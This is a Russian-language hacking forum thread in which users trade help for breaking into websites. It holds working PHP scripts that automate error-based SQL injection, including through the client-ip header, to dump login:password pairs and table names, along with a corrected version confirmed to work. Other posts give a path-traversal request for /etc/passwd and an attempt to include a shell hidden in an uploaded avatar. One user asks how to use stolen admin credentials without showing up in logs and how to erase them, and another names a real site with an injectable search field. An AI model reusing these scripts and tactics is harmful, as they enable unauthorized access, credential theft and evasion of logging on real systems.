Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to mr_zedox
    Есть хороший плагин для Firefox под названием HackBar
     
  2. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    спасибо, но предпочитаю chrome браузер. А на счет вопроса, то уже нашел решение: http://chxo.com/scripts/hex2string.php
     
  3. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    Ребят,неужели никто не знает sql-dumper'a,который поддерживает иньекции в хэдере...
    Нужно сдампить мыло:пасс с error-based скули в хэдере "client-ip"...
    мб,возможно какой-то скрипт набросать...

    буду очень благодарен за любую помощь ;) :rolleyes:
     
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Так есть же. rSaUnDumper вроде называется.
    http://tools.0x0000ed.com/sqlhex.php
     
  5. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    здравствуйте, есть sql инъекция, через которую вынул логин и пароль админа. Нашел администраторскую панель, а заходить туда боюсь, т.к. логи спалят. Какие есть способы пролезть в админку чтобы не попасть в логи, либо как их можно потом стереть?
    у меня ОС linux fedora, по этому не знаю здесь местные тулзы для подключения к проксе, не подскажите?
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    фак, тебя что в гугле забанили?
    http://mrthe.name/2010/01/widecap/
     
  7. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Мне нужно для ОС linux, а не для windows...
     
  8. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    rSaUnDumper последней версии,к сожалению,тоже не справился...(
    неужели ни у кого не завалялся такой скрипт,простой дамп по лимиту?) :rolleyes:
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    как то писал скрипт на пхп парсер по лимиту, и запускал на шеллах, щас потерялся, но как идея работает на верняка...

    P.S:
    Вот нашел у себя сырой скриптик, тебе его только под свою скулю сделать и все, конечно же возможны баги...
    PHP:
    <?
    set_time_limit (0);
    $limit='3';//до какого лимита
    $limit1='0'//от какого лимита
    $filename 't.txt';
    echo 
    "<font color=blue><b>Стартанул перебор лимита:</b></font><br>";
    echo 
    $filename."<br>";
    while (
    $limit1++<$limit) {
    echo 
    $limit1.'<br>';
    $content file_get_contents("http://localhost/index.php?productID=728'+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,U_ID,U_PASSWORD)+from+WBS_USER+limit+".$limit1.",1),1,63)+,+FLOOR(RAND(0)*2)))+--+");
    $id "#Duplicate entry(.*) for key 1#U";
    preg_match_all($id,$content,$result);
    $idd=$result[0];
     
    $file fopen($filename,"a+");
    fwrite($file$limit1.$idd[0]."\n");
    fclose ($file);

    echo 
    $limit1.$idd[0]."<br>";
    }
    echo 
    "<font color=green><b>БД слита!</b></font>";

    ?>
     
    _________________________
    #20509 winstrool, 31 May 2012
    Last edited: 31 May 2012
  10. Bamba

    Bamba New Member

    Joined:
    9 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Не возможно пойти назад. http://site.ru/nastroyki.php?a=igry_java&id=../../../../../../../../etc/passwd Есть альтернатива обратному пути? То есть символу ../
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    winstrool,
    ему надо, чтоб в хидерах.
    PHP:
    <?
    // By Ereee
    set_time_limit(0);

    $start 0//начало
    $end 1000//конец
    $file_to 'data.txt';



    for(
    $i=$start;$i<=$end;$i++)
    {

    $inject="and(select+1+from(select+count(*),concat((select+concat(0x7c7c7c,table_name,0x7c7c7c)+from+information_schema.tables+limit+$i,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+E"//раскрученная скулья, точнее часть. Если изменить, не забудь limit 0,1 заменить на limit $i,1

    $init curl_init();
    curl_setopt($initCURLOPT_URL,"http://nasa.gov"); // URL
    curl_setopt($initCURLOPT_RETURNTRANSFER1);
    curl_setopt($initCURLOPT_SSL_VERIFYPEER0);
    curl_setopt($initCURLOPT_SSL_VERIFYHOST0);
    curl_setopt($initCURLOPT_HTTPHEADER, array('CLIENT-IP: '.$inject)); //Header Client-Ip
    $source curl_exec($init);
    curl_close($init);
    preg_match("#|||(.*)|||#"$source$data);
    file_put_contents($file_to,$data[1]."\r\n",FILE_APPEND);
    }
    //P.S. Писал нуб в PHP :)
    ?>
    Так? Не?
     
    #20511 Ereee, 1 Jun 2012
    Last edited: 1 Jun 2012
  12. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    спасибо Ereee,winstrool за предоставленные скрипты ;)
    вариант Ereee дампит пустые строчки,мб ошибка в... ?
    Code:
    preg_match("#|||(.*)|||#", $source, $data);
    очень хотелось бы sqlmap'ом,удобная тулза...но как я ни старался,проверял при level=5 и risk=3,указывал параметр "client-ip",добавлял --headers="client-ip: *" - sqlmap не находил скулю...он проверяет куки,юзер-агент,реферер,хост,но не client-ip...погуглил,похоже что поддержки иньекций в других хэдерах ещё нет(
     
    #20512 HeaVeNSeR, 1 Jun 2012
    Last edited: 1 Jun 2012
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Пробелы удалил? Раскрученную скулью поставил?
     
  14. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    да, limit $1,1 добавлял...пробывал .$1,1...в браузере проверял,всё норм...странно
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Тьфу! Имя переменной $i, а не $1 =\
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Исправил код Ereee, теперь все работает проверял на себе
    PHP:
    <?php 
    error_reporting
    (E_ALL);
    set_time_limit(0);
    $start 0;
    $end 10;
    $file_to 'data.txt';
    for(
    $i=$start;$i<=$end;$i++) { $inject="'and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit ".$i.",1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'";
    $init curl_init();
    curl_setopt($initCURLOPT_URL,"http://site.com");
    curl_setopt($initCURLOPT_RETURNTRANSFER1);
    curl_setopt($initCURLOPT_FOLLOWLOCATION1); 
    curl_setopt($initCURLOPT_SSL_VERIFYPEER0); 
    curl_setopt($initCURLOPT_SSL_VERIFYHOST0); 
    curl_setopt($initCURLOPT_HTTPHEADER, array("client-ip: ".$inject));
    $source curl_exec($init);
    curl_close($init);
    preg_match("#Duplicate entry '(.*)' for key#"$source$data);
    file_put_contents($file_to,$data[1]."\r\n",FILE_APPEND); 
    }  
    ?>
     
    #20516 cat1vo, 1 Jun 2012
    Last edited: 1 Jun 2012
    1 person likes this.
  17. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    рабочий вариант,благодарю ;)

    я $i как раз и пробывал,всё равно чёт не дампил :rolleyes:
     
  18. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    в vbseo есть LFI, вида:
    Code:
    vbseo.php?vbseoembedd=1&vbseourl=
    
    Загрузил на форуме аватар(внутри шелл), пытаюсь заинклюдить:
    Code:
    vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif
    
    Показывает просто напросто саму картинку
    Попробывал с нулл байтом:
    Code:
    vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif%00.php
    
    Выдает ошибки:
    Code:
    Warning: require(38290.gif) [function.require]: failed to open stream: No such file or directory .../public_html/forum/vbseo.php on line 1544
    
    Fatal error: require() [function.require]: Failed opening required '38290.gif' (include_path='.:/usr/local/lib/php') iny .../public_html/forum/vbseo.php on line 1544
    
     
  19. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Учите матчасть Уважаемый прежде чем задавать подобные вопросы.
    Во первых: Необходимо убедиться что после залития аватарки PHP код внутри файла сохранился в целостности. Собственно ,скорее всего, картинка сконвертилась или рекодилась в результате чего код `побился` и естественно не выполняется при выполнении остальных условий инклуда.
     
  20. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ребят, не знаю за что удалили мой пост, ведь я не просил никого ничего ломать - я попросил помочь мне, обьяснить почему не работают мои запросы, ведь я просто хочу разобраться. Впредь если мой пост удалят по несоответствию с правилами - напишите мне хотя бы в личку ответ. Спасибо заранее. На страничке http://footquest.poltava.ua/players в строке поиска скуль иньекция. Я пытался делать различные запросы но скорее всего передающиеся данные в запросе в скобочках. Как это обойти подскажите плс.
     
Thread Status:
Not open for further replies.